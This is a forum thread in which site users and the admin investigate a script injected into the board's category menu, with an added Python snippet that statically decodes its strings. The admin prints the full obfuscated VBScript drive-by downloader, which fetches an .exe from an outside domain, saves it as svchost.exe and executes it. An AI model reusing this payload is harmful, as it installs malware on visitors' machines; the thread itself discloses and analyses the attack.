Forum "jump to" menu problem

Tartara
Posts: 88
Joined: Tue Dec 20, 2005 10:28 am
Location: Tucson, AZ


Post by Tartara »

On forum pages that have a drop-down "Jump to" menu at the bottom, I'm getting a weird error that's causing the page to render with a width about ten times my screen size! The problem seems to be an item in the drop-down menu where some javascript is appearing verbatim. I've taken a screenshot in the hopes you can track it down.
[screenshot image]

My browser is Safari 2.0.4 on Mac OS X 10.4.10

DM.
Census Taker
Posts: 1130
Joined: Mon Oct 03, 2005 12:27 pm
Location: Toronto, Canada

Post by DM. »

You mean there's more browsers than just Firefox? :shock:

Skyfire
Trolling Enforcement
Posts: 708
Joined: Thu Aug 18, 2005 2:29 am
Location: New Jersey

Post by Skyfire »

So long as (s)he's using anything other than IE, it's good with me.
Admin on WoWWiki
Moderator, Blogger on Wowhead

Tartara
Posts: 88
Joined: Tue Dec 20, 2005 10:28 am
Location: Tucson, AZ

Post by Tartara »

DM. wrote:You mean there's more browsers than just Firefox? :shock:
It's okay - I'm using Firefox at work! I haven't used IE in months (years?), unless I need to for testing purposes, and then I have to borrow someone else's computer to do so. When Microsoft decided to stop offering IE for Mac, no-one was happier than me :)

Tartara
Posts: 88
Joined: Tue Dec 20, 2005 10:28 am
Location: Tucson, AZ

Post by Tartara »

Additional information:

Here's the source of the problematic option tag (replace {} with <>)
{option value="-1"}General{script src=http://www.exponentialsl.com/tags/css.j ... t}{/option}
The homepage of that domain looks a little dodgy - any idea why the script is in there, Rollie?

Tartara
Posts: 88
Joined: Tue Dec 20, 2005 10:28 am
Location: Tucson, AZ

Post by Tartara »

Hm, not liking what I see here. Looking at that script sitting quietly in the Jump to: menu (which I'd never have noticed if Safari hadn't helpfully displayed it to me) I see a few disturbing things, including a mention of svchost.exe which - according to http://www.liutilities.com/products/win ... y/svchost/ - is a BAD BAD THING. Any JavaScript whizzes around here want to look at it?

A quick google turns up just one other site referencing exponentialsl.com - and that's in some title tags on wowstatus.net, a site dedicated to spreading information on WoW private servers. :P

The script shows up in the source of these forums in Firefox too, though without the visible code in the menu, which makes me think perhaps it's actually running. Lucky I'm on a Mac! Any of you reading these forums with Windows, you might want to hold off for a bit. And run your virus/trojan scanners.

Rollie, I hope you haven't been hacked! :shock:

Skyfire
Trolling Enforcement
Posts: 708
Joined: Thu Aug 18, 2005 2:29 am
Location: New Jersey

Post by Skyfire »

Google (http://www.google.com/search?hl=en&q=sv ...) says svchost is fine. The ones that are issues are those that are made to look like svchost, like svch0st, or scvhost, etc.
Admin on WoWWiki
Moderator, Blogger on Wowhead

Rollie
Site Admin
Posts: 4783
Joined: Sun Nov 28, 2004 11:52 am
Location: Austin, TX

Post by Rollie »

OK, I'm out of town and on my laptop, digging into it as best I can for now. If nothing else, I may shut the forums down until I return.

Course if I do, you won't likely be able to read this =)
phpbb:phpinfo()

Rollie
Site Admin
Posts: 4783
Joined: Sun Nov 28, 2004 11:52 am
Location: Austin, TX

Post by Rollie »

Well, I was able to remove the offending entry. Unfortunately it means I have been compromised to some degree here. It could be as minor as the admin account having been hacked, to as major as my actual server being hacked. Unfortunately there is no way to know when this happened.

I'm still researching what it was doing exactly as I'm sure it was no good...
phpbb:phpinfo()

Rollie
Site Admin
Posts: 4783
Joined: Sun Nov 28, 2004 11:52 am
Location: Austin, TX

Post by Rollie »

This is what it looks like it was trying to run. From what little research I've done, it appears that it is trying to download a file, wow.exe, from the exponentialsl.com site. My best guess is that this is a trojan/keylogger. I would strongly recommend all users update their virus scanners and do a fresh check.
<script>
on error resume next
t1= "http:\/\/"
t2= "www."
t3= "expone"
t4= "ntialsl"
t5= ".com"
t6= "\/wow"
t7= ".exe"
tcsafe = t1&t2&t3&t4&t5&t6&t7
m11="o"
m12="bj"
m13="ect"
m1=m11&m12&m13
m21="cl"
m22="ass"
m23="id"
m2= m21&m22&m23
m31="clsid:"
m32="BD96C556"
m33="-65A3-"
m34="11D0-983A"
m35="-00C04F"
m36="C29E36"
m3=m31&m32&m33&m34&m35&m36

m41="Microsoft"
m42=".XML"
m43="HTTP"
m4=m41&m42&m43

m51="Shel"
m52="l.App"
m53="lication"
m5=m51&m52&m53

m61="Scrip"
m62="ting.Fi"
m63="leSyst"
m64="emObject"
m6=m61&m62&m63&m64

sub tcsafe2exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub

Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3

Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe2exe(m5,X9)
</script>
At this point I'm not sure how the intruder got in or how serious the invasion is. I am embarrassed and saddened by this news.

As far as I can tell only IE users or other browsers with installed ActiveX components were at risk. I will do more research as I can and will relay information as it becomes available.

I'm sorry =(
phpbb:phpinfo()
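
The string-splitting in the script above exists to keep the download URL and the COM ProgIDs out of signature scanners. The Python below is an added example, not code from the post or from phpBB: it replays only the literal assignments and "&" joins statically, so an analyst can recover what the script wanted without running any of it. SAMPLE is a constructed excerpt of the payload shown above.

```python
import re
# Constructed excerpt of the obfuscated VBScript from the post above: the
# string-building lines plus one object line (to show that it is skipped).
SAMPLE = r'''t1= "http:\/\/"
t2= "www."
t3= "expone"
t4= "ntialsl"
t5= ".com"
t6= "\/wow"
t7= ".exe"
tcsafe = t1&t2&t3&t4&t5&t6&t7
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
X9="svchost.exe"
set Xa = Xc.createobject(a5,"")'''
ASSIGN = re.compile(r'^\s*(?:set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.I)

def resolve_strings(script):
    """Replay literal assignments and '&' joins statically; nothing is run."""
    env, composed = {}, set()
    for m in filter(None, map(ASSIGN.match, script.splitlines())):
        name, terms = m.group(1), [t.strip() for t in m.group(2).split('&')]
        parts = []
        for term in terms:
            if len(term) > 1 and term[0] == term[-1] == '"':
                parts.append(term[1:-1])          # VBScript has no escapes
            elif term in env:
                parts.append(env[term])
            else:
                break  # object/method expression: leave it unresolved
        else:
            env[name] = ''.join(parts)
            if len(terms) > 1:
                composed.add(name)
    return env, composed

def extract_indicators(script):
    """Classify rebuilt strings; literal '\/' pairs are normalised for reporting."""
    env, composed = resolve_strings(script)
    out = {'urls': [], 'progids': [], 'dropped_files': []}
    for name, value in env.items():
        if name in composed and value.lower().startswith('http'):
            out['urls'].append(value.replace('\\/', '/'))
        elif name in composed and '.' in value:
            out['progids'].append(value)      # COM ProgIDs handed to CreateObject
        elif re.fullmatch(r'[\w-]+\.exe', value, re.I):
            out['dropped_files'].append(value)
    return out
```

Run against the full script from the post, the same functions also surface Microsoft.XMLHTTP, Shell.Application and Scripting.FileSystemObject, which together describe the download-save-execute chain.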

WyriHaximus
Census Taker
Posts: 243
Joined: Tue Oct 18, 2005 2:17 am
Location: Koedijk, Alkmaar, Noord-Holland, The Netherlands
Contact:

Post by WyriHaximus »

Wow, that is a nasty little bugger :O! I hope you updated your software properly like a good developer should know, Rollie :P.

Balgair
Araiceil
Posts: 1716
Joined: Fri Sep 30, 2005 11:47 am
Location: UK

Post by Balgair »

Eep, not good :? The only wow.exe files on my computer are the real thing, but I'm updating and running virus/antispyware scans anyway to be on the safe side - I'm pretty sure I have my IE locked down to be safe from keyloggers etc., but still gonna double-check to be sure!

Rollie
Site Admin
Posts: 4783
Joined: Sun Nov 28, 2004 11:52 am
Location: Austin, TX

Post by Rollie »

So I think I've tracked down some more details. It appears that the individual(s) responsible basically used an SQL injection attack to give themselves admin accounts on WCR. Using these admin accounts, they were able to put the scripts into the Category names.

I now face the daunting task of trying to figure out where they were able to successfully launch the SQL injection attack and snuff it out.

I believe this incident occurred around 8/14 midnight as that is when the account that gave access was created. I have disabled/banned the accounts and removed the admin rights. I'll also be modifying the phpbb code to disallow that type of thing from occurring again in the future.
phpbb:phpinfo()

heartless_
Posts: 126
Joined: Sun Jan 09, 2005 8:17 am

Post by heartless_ »

Sorry to hear about it man, but at least you were honest about it and have a clue as to how to fix it. I've seen things like this happen on guild run forums and it is disastrous.
